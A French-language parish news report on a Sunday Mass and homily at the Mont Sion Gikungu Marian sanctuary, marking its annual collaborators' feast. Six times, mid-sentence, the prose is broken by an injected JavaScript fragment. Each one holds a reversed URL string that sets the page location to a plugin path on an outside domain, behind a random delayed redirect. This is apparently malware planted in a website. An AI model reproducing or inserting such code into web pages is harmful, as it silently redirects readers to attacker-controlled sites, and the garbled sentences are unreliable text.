La célébration eucharistique de ce vingt-deuxième dimanche du Temps Ordinaire à 10 heures a été présidée par le Recteur du Sanctuaire, Père Longin NTIRANYIBAGIRA. Signalons que c’était aussi le dernier dimanche du mois d’août, un dimanche qui a coïncidé avec la célébration de la fête des collaborateurs, une fête qui est célébrée chaque année depuis une dizaine d’années et qui rassemble tous les groupes, commissions et chorales exerçant leur apostolat au Sanctuaire marial de la Reine de la paix et de la réconciliation de Mont Sion Gikungu. Vu l’importance de cette cérémonie, toutes les chorales se sont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc regroupées pour animer cette messe en chants liturgiques.

Dans son introduction, le Père NTIRANYIBAGIRA, après avoir accueilli tous les fidèles, est revenu sur la fête des collaborateurs du Sanctuaire, lesquels forment l’Église-Famille. Il les a remerciés pour leur contribution. L’on peut se poser la question de savoir lequel de ses groupes se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne entièrement plus que les autres dans son apostolat, a-t-il continué. La réponse est la suivante : tous les groupes interviennent de la même façon selon leur apostolat, a-t-il conclu son mot introductif.

Les saintes Écritures ont été tirées respectivement du livre de Ben Sira le Sage (Si 3,17-18.20.28-29), de la lettre aux Hébreux (He 12, 18-19.22-24a) et de l’Évangile de Jésus Christ selon saint Luc (Lc 14,1.7-14).  

Homelie

La parole d’haujourd’hui vient nous montrer la fête que Dieu a préparée à ces apôtres. Cette fête nous rappelle aussi la fête que nous avons ici au Mont Sion Gikungu pour tous les collaborateurs venus des différents groupes et commissions qui y exercent leur apostolat pour que tous les pèlerins qui viennent prier Dieu se sentent comme chez eux. La fête en sa signification nous montre le jour où les gens se réunissent ensemble en provenance des divers endroits pour partager le repas du Seigneur ainsi que sa Parole. C‘est un jour qui ne se ressemble pas aux autres jours du fait de sa particularité. Ce jour si spécial a un but et un organisateur, a fait savoir le célébrant au départ. Ici dans les saintes Écritures, l‘organisateur c’est Jésus lui même, les invités, c’est vous et moi et le partage de tous les biens est équitable. Celui qui t’invite chez lui manifeste pour toi son amour de t’avoir invité chez lui pour partager sa joie. Dieu nous a tous rassemblé sur cette haute montagne pour nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner la nourriture qu’il a préparé pour nous. La nourriture que Jésus nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne c’est son corps et son sang pour nous manifester son amour. Il nous a rassemblés parce que nous formons une seule famille qui est l’ Eglise. La part de tout un chacun s‘avère indispensable pour bâtir notre Eglise comme une famille. Jésus Christ est la tête de l’Eglise que nous formons et nous, nous sommes les membres de son corps. L’Eglise est notre mère, nous sommes appelés à partager tout ce que nous avons comme des frères. Dieu nous a rassemblés ici au Mont Sion Gikungu pour partager son repas car il nous aime sans aucune exception. Chacun est digne d’être membre de l’Eglise catholique. Eglise signifie les invités de Jésus Christ, Eglise de Dieu, les gens rassemblés par Jésus Christ. Aujourd’hui, c’est nous qui formons l’Eglise de Jésus Christ, c’est pourquoi nous sommes fiers et dignes d’être chrétien et nous sommes dans la joie totale, a expliqué le Recteur.

L’Eglise est l’assemblée des enfants de Dieu mais d’aucuns ignorent cette chance qu’ils ont d‘en faire partie. Nous contribuons à bâtir ensemble notre Eglise en fraternité, a insisté le Père NTIRANYIBAGIRA. Ils veulent que les autres jouent leur rôle alors que le rôle de tout un chacun est primordial dans l’Eglise. L’Eglise nous appartient tous, elle est bâtie sur le Saint Esprit. L’Eglise, c’est là où Jésus nous rassemble pour nous enseigner la Parole de Dieu, nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne à manger pour partager sa joie. L’Eglise est une famille des enfants de Dieu, tous les chretiens qui ont été baptisés font partie de cette famille à l’exception des non-baptisés. L’Eglise appartient à tout le monde à commencer par les enfants jusqu’aux plus âgés. Aujourd’hui,nous nous réunissons tous ici comme des frères et soeurs en provenance des différents groupes et commissions pour vivre et partager cette joie de former une Eglise-famille. Nous tous, nous formons le corps du Christ, personne ne peut pas faire tout mais nous travaillons en synergie. Ce jour de fête nous rappelle que nous sommes des frères et soeurs. Que personne ne cherche pas à mettre les obstacles devant l’autre dans l’accomplissement de vos tâches. Le Père Recteur du Sanctuaire a conclu son homélie en saluant les efforts de tout un chacun pour la réussite de l’apostolat sans oublier les responsables des groupes et commissions qui se toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent corps et âme pour que les activités planifiées durant l’année liturgique se passent comme prévu. Que la Vierge Marie nous guide et nous protège pour toujours. Amen.

Frédéric N.